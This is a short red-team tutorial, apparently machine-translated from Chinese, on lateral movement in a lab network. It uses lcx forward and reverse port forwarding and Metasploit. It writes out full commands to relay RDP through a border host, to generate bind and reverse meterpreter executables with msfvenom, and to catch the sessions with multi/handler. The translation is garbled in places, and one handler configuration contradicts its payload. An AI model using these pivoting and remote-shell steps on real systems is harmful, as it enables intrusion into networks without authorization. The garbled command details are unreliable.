table of Contents
0x01 forward port forwarding
0x02 reverse port forwarding
0x03 msf forward shell
0x04 msf reverse shell
Note:
Border machine win08 192.168.222.175
Network machines win7 192.168.222.137
msf machine Ubuntu 192.168.222.177
0x01 forward port forwarding
Perform port forwarding on the border of machine commands that allow traffic from the port to the network to forward all the specified IP specified port.
Here closed the firewall, use the netsh normally be open to the ports, detailed steps can refer to the previous article [ use netsh to port forwarding ]
Here we will all traffic on the local port 53 to port 3389 are forwarded machine within the network, so remote connection
lcx.exe -tran 53 192.168.222.137 3389
Of course, after the execution, we reconfirm whether the port is enabled
Then we connect remotely in local
0x02 reverse port forwarding
If we only webshell current target, and there is no boundary host can use, then it can make the network traffic through a reverse port forwarding are forwarded to your host.
Note: Here we use the boundary win08 machine to replace our local host
First monitor the implementation of the local machine
lcx.exe -listen 53 1234
Use netstat -ano make sure the port is enabled
And then executed on the target machine (win7)
lcx.exe -slave 192.168.222.175 53 127.0.0.1 33893389 is about local traffic are forwarded to port 53 on win8 machine, the server can be used if there is a boundary, then execute the command at the border server, the corresponding IP and port change it.
Then locally (Win8) is connected to a remote
0x03 msf forward shell
Use lcx performs a forward port forwarding within the network to connect meterpreter
First to generate a horse with msf
msfvenom -p windows/x64/meterpreter/bind_tcp lport=53 -f exe >> 123.exe
Then go to the machine to perform boundary lcx forward port forwarding from port 53 to forward all traffic to the intranet meterpreter
lcx.exe -tran 53 192.168.222.137 53
Then the machine within the network to run our horses
And then back to Ubuntu, he listens, listens to port the boundaries of the machine 53
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 53
set rhost 192.168.222.175
run
0x04 msf reverse shell
Reverse shell is the same reason
First of all, Mr. into our horses, even back here in the IP and port are the boundaries of the machine
msfvenom -p windows/x64/meterpreter/reverse_tcp lport=53 lhost=192.168.222.175 -f exe >> 123.exe
Then listen to the machine to perform boundary
lcx.exe -listen 53 8888
Network machines to execute our horses
Back on Ubuntu, listens
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lhost 192.168.222.175
set lport 8888
exploit -j
The first visible success did not bounce session, that the reasons lcx, multi try it twice
No public debut article: unintentional balderdash (wuxinmengyi)
This is a record red team learning, Principal notes, personal growth number of public
Concern to scan code
